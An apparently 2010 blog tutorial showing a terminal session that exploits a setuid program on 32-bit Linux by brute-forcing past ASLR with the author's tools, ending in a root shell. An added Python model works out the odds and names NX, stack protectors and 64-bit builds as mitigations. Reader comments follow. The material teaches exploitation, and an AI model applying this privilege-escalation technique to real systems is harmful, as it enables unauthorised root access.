break a time, with break the c0de…

easy buffer overflow exploitation


This is a buffer overflow scenario with ASLR (Address Space Layout Randomization) enabled, using some of my tools that make it so easy… The session below first confirms ASLR is on (randomize_va_space = 2), finds the crash offset with bufferbruteforce.py, then lets stackbf re-run ron with one fixed return address until the randomized stack happens to land on it; the garbled "message" is just the little-endian bytes of that return address (0xbfd24880) printed as text, and the final attempt drops a root shell.

gunslinger@c0debreaker:~/bof$ cat /proc/sys/kernel/randomize_va_space
2
gunslinger@c0debreaker:~/bof$ ./ron a
The message was: a
Program completed normally!

gunslinger@c0debreaker:~/bof$ ./ron aaa
The message was: aaa
Program completed normally!
gunslinger@c0debreaker:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/ron -s 1 -e 500

Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>

[*] Checking Existing application 					[Ok]
[*] Checking perl 							[Ok]
[*] Preparing for bruteforcing buffer 					[Ok]
[*] buffering on 44 byte(s)
[!] Application got segmentation fault by giving 44 byte(s) into buffer !!

gunslinger@c0debreaker:~/bof$ ./stackbf ron 48
[*] Using return address 0xbfd24880
[*] Environment variable 128 kb
[*] Shellcode size 28 bytes
The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

[the same two lines repeat for each further run, 55 attempts in total, until the randomized stack lands on the return address and the shell below appears]

# id
uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
root
# uname -a
Linux c0debreaker 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# exit
gunslinger@c0debreaker:~/bof$
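Added example (my own, not the author's tools nor code from the page): a geometric-trial model of why this brute force finishes in a few dozen runs on 32-bit and why it does not on 64-bit. It assumes the Linux kernel's per-architecture STACK_RND_MASK constants, takes the landing window from the "128 kb" environment variable and the 55 attempts from the session above, and ignores sub-page jitter.

```python
"""Geometric-trial model of the stack-ASLR brute force shown above.

Assumption: each run of the target places the stack at a fresh random
offset, and a run succeeds only if the fixed return address lands inside
the padding that stackbf placed in the environment (128 kb in the session).
Per-try success is then roughly window / randomization range.
"""
import math

PAGE = 4096
# Linux fs/binfmt_elf.c randomize_stack_top(): the stack top is shifted by
# (get_random_int() & STACK_RND_MASK) pages.  Kernel constants per arch.
STACK_RND_MASK = {"i386": 0x7FF, "x86_64": 0x3FFFFF}


def stack_range_bytes(arch):
    """Size of the region the stack top can be randomized over."""
    return (STACK_RND_MASK[arch] + 1) * PAGE


def per_try_success(window_bytes, arch):
    """Chance that one guess lands inside the landing window.

    Simplification: ignores the sub-page jitter arch_align_stack() adds and
    treats every byte of the window as a usable landing spot.
    """
    return min(1.0, window_bytes / stack_range_bytes(arch))


def expected_tries(window_bytes, arch):
    """Mean number of runs before the first success (geometric distribution)."""
    return 1.0 / per_try_success(window_bytes, arch)


def success_within(tries, window_bytes, arch):
    """Probability of at least one success in the given number of runs."""
    p = per_try_success(window_bytes, arch)
    return 1.0 - (1.0 - p) ** tries


def tries_for_confidence(confidence, window_bytes, arch):
    """Smallest number of runs that succeeds with the requested probability."""
    p = per_try_success(window_bytes, arch)
    if p >= 1.0:
        return 1
    return math.ceil(math.log(1.0 - confidence) / math.log(1.0 - p))


if __name__ == "__main__":
    window = 128 * 1024  # "Environment variable 128 kb" in the session
    for arch in ("i386", "x86_64"):
        print(f"{arch}: range {stack_range_bytes(arch) >> 20} MiB, "
              f"expected tries {expected_tries(window, arch):.0f}, "
              f"P(success within 55 runs) {success_within(55, window, arch):.3f}")
```

On i386 the model gives an expected 64 runs and a 58% chance of success within the 55 runs seen above; on x86_64 the same window needs on the order of 131,000 runs. Treating 32-bit ASLR as the only mitigation for a setuid binary is therefore not defensible; NX, a stack protector and a 64-bit build each change the arithmetic.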

8 responses

  1. Cyb3erFr3ed0M

    Bro Gun, I want to ask a little… I followed your tutorial from start to finish but it kept failing at the end… I'm using Ubuntu 10.04… if I may know, what is buffer overflow exploitation actually used for, bro? Reply to my mail please, rendy_rock44@yahoo.co.id

    July 26, 2010 at 6:27 am

    • Its use is gaining user privileges; the failure is probably in the return address, bro

      July 26, 2010 at 7:24 am

  2. Cyb3erFred0M

    I don't know what “gaining user privileges” means, bro Gun, hehehe… sorry, still a total newbie… if I may know, how do you go about exploiting a target, bro Gun? Teach me a bit, bro Gun… I've spent two months studying one exploitation technique, trying to figure out what it means, and when I practice it, it fails too… okay bro, teach me a bit

    July 31, 2010 at 1:22 pm

    • Gaining user privileges means taking over a user's access rights on the system so that the system treats us the same as the owner of that setuid binary file

      August 1, 2010 at 6:45 am

  3. Cyb3erFred0M

    Ohhh, I see, bro… okay, straight to trying it again… thanks bro Gun

    August 1, 2010 at 10:10 pm

    • You're welcome bro, don't hesitate to ask…

      August 2, 2010 at 5:25 am

  4. Cyb3erFred0M

    Bro Gunnnn, asking again: what does that “ron a” above mean……

    August 9, 2010 at 10:52 pm

    • Trying to input data into the ron application with the letter a, bro

      August 10, 2010 at 5:08 am
